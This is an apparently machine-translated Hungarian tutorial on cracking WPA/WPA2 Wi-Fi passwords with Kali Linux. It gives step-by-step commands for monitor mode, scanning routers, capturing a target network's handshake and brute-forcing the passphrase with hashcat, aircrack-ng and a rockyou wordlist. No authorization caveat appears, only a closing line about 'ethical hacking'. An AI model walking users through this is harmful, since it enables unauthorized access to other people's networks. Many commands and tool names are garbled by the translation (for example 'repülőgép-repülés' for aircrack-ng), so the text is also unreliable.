Kali Linux WPA és WPA2 támadások

Kali Linux Wpa Wpa2 Attacks



Ez a cikk áttekintést nyújt a Wi-Fi-ről és a Wi-Fi-hackelésről. Kezdjük a Wi-Fi és a hackelés alapvető bevezetésével.

Bevezetés

A vezeték nélküli vezeték nélküli hálózat vagy a Wi-Fi egy olyan technológia, amelyet kábel vagy vezetékes kapcsolat nélkül biztosítanak a számítógépes hálózathoz. A Wi-Fi a 2,4 GHz-től 5 GHz-ig terjedő tartományban működik, és nem zavarhatja a mobiltelefonokat, rádióadásokat, televíziót vagy kézi rádiókat. A Wi-Fi funkció úgy működik, hogy adatokat továbbít rádióhullámokon keresztül a kliens eszköz és a router nevű eszköz között. Az útválasztó adatokat továbbíthat a rendszerekre belsőleg vagy külsőleg az internetre. A Wi-Fi sem több, sem kevésbé biztonságos, mint egy hagyományos vezetékes hálózat, hanem egy teljesen más interfész. A legfontosabb dolog, amire emlékeznünk kell, hogy a WEP (Wired Equivalent Privacy, WEP) 1997 -ben jelent meg, és könnyű feltörni. A WEP percben vagy rövidebb idő alatt megszakadhat. A modern eszközök nem működnek a WEP -hálózattal, és a legtöbb útválasztó már nem támogatja azt. A frissített WEP -hez feltörési módszerekkel is fel lehet törni.







Hackelés

Egyszerűen fogalmazva, ha valaki személyes adatait feltörik vagy feltörik, hackelésnek nevezik. A hackerek könnyen hozzáférhetnek személyes eszközéhez vagy számítógépéhez. Feltörhetik a jelszavakat, és hozzáférhetnek a vezeték nélküli hálózathoz. Megkerülhetik a vezeték nélküli hálózat biztonságát, és betörhetnek, függetlenül attól, hogy a felhasználó milyen típusú titkosítást használ.



Általában, ha valaki vezeték nélküli hálózatába szeretne betörni, először tudnia kell a használt titkosításról. Amint korábban említettük, a WPE típusú hálózat már jó ideje nem volt biztonságos. Általában néhány perc alatt fel lehet törni. Ugyanez vonatkozik a WPA hálózatra is, ha gyenge jelszót használ. Ha azonban erős jelszót használ, az viszonylag biztonságos, kivéve a WPS7 PIN -kódot. Ez egy hardveralapú sebezhetőség, amelyet sok útválasztó használ, így a hackerek megszerezhetik a PIN -kódot, amely teljes hozzáférést biztosít az útválasztóhoz. Ez általában egy nyolcjegyű szám, amelyet az útválasztó aljára írnak. Ezt a számot az alábbi lépések végrehajtásával származtathatja.



Nyissa meg a Kali Linux terminált

Az első lépés a Kali Linux terminál egyszerű megnyitása. Ehhez nyomja meg a gombot ALT+CTRL+T . A terminál megnyitásához nyomja meg a terminál alkalmazás ikonját is.





Írja be a Parancsot a aircrack-telepítéshez

A következő lépés az aircrack-ng telepítése. Ehhez írja be a következő parancsot:

$sudo apt-get installrepülőgép-repülés



Írja be a jelszót a bejelentkezéshez

A hozzáférés engedélyezéséhez írja be a root jelszavát. A bejelentkezési jelszó megadása után nyomja meg a gombot Belép gombot a folytatáshoz.

Install aircrack-ng

Nem sokkal a bejelentkezés után nyomja meg az Y gombot. Ez lehetővé teszi a aircrack-ng telepítését.

Kapcsolja be az airmon-ng-t

Az Airmon-ng az a szoftver, amellyel a felügyelt mód monitor módba konvertálható. Az airmon-ng bekapcsolásához használja a következő parancsot:

$levegő-ng

Keresse meg a monitor nevét

A következő lépés a monitor nevének megkeresése a hackelés folytatásához. A monitor nevét az interfész oszlopban tekintheti meg. Bizonyos esetekben előfordulhat, hogy nem tudja megtekinteni a monitor nevét. Ez a hiba akkor fordul elő, ha a kártya nem támogatott.

Kezdje el a hálózat figyelését

A felügyeleti folyamat megkezdéséhez írja be a következő parancsot:

$airmon-ng start wlan0

Ha más hálózatot céloz meg, akkor cserélje le a „wlan0” nevet a megfelelő hálózatnévre.

Monitor mód interfész engedélyezése

A következő parancsot használja a monitor mód interfész engedélyezéséhez:

$iwconfig

Öld meg azokat a folyamatokat, amelyek hibákat adnak vissza

A rendszer némi interferenciát okozhat. Használja a következő parancsot a hiba eltávolításához.

$légi ellenőrzésmegöl

Ellenőrizze a monitor felületét

A következő lépés a monitor nevének felülvizsgálata. Ebben az esetben a neve „wlan0mon”.

Az összes útválasztó neve

Az összes elérhető útválasztó neve megjelenik a következő parancs beírása után.

$airodump-ng mon0

Keresse meg az útválasztó nevét

Először meg kell találnia a feltörni kívánt útválasztó nevét.

Győződjön meg arról, hogy az útválasztó WPA vagy WPA2 biztonságot használ

Ha a WPA név megjelenik a képernyőn, akkor folytathatja a hackelést.

Jegyezze fel a MAC -címet és a csatorna számát.

Ez az alapvető információ a hálózatról. Megtekintheti őket a hálózat bal oldalán.

Figyelje a kiválasztott hálózatot

A következő paranccsal nyomon követheti a feltörni kívánt hálózat részleteit.

$airodump-ng-ccsatorna--bssMAC-ban ben /gyökér/Asztal/my0

Várja meg a kézfogást

Várjon, amíg a képernyőn megjelenik a „WPA HANDSHAKE” felirat.

A gombbal lépjen ki az ablakból CTRL+C . Egy cap fájl jelenik meg a számítógép képernyőjén.

Nevezze át a cap fájlt

Az egyszerűség kedvéért szerkesztheti a fájl nevét. Ehhez használja a következő parancsot:

$mv./-01.cap name.cap

A fájl konvertálása hccapx formátumba

A Kali konverter segítségével egyszerűen konvertálhatja a fájlt hccapx formátumba.

Ehhez használja a következő parancsot:

$cap2hccapx.bin name.cap name.hccapx

Telepítse a naive-hash-cat-ot

Most a szolgáltatás használatával feltörheti a jelszót. Használja a következő parancsot a repedés megkezdéséhez.

$sudo git klónhttps://github.com/brannondorsey/naiv-hashcat
$CDnaiv hash-macska

$becsavar-AZ -vagydicts/rockyou.txt

Fuss naiv-hash-macska

A naiv hash-cat szolgáltatás futtatásához írja be a következő parancsot:

$HASH_FILE= név.hccapxPOT_FILE= név.edényHASH_TYPE=2500./naiv-hash-macska.sh

Várja meg a hálózati jelszó feltörését

Amint feltörik a jelszót, megemlítik azt a fájlban. Ez a folyamat hónapokig vagy akár évekig is eltarthat. A jelszó mentéséhez írja be a következő parancsot, amikor ez a folyamat befejeződött. A feltört jelszó az utolsó képernyőképen látható.
[cc lang = bash width = 780 ″]
$ aircrack -ng -a2 -b MAC -w rockyou.txt name.cap
[DC]

Következtetés

A Kali Linux és eszközei használatával a hackelés egyszerűvé válhat. A jelszavakhoz egyszerűen hozzáférhet, ha csak a fent felsorolt ​​lépéseket követi. Remélhetőleg ez a cikk segít feltörni a jelszót, és etikus hackerré válni.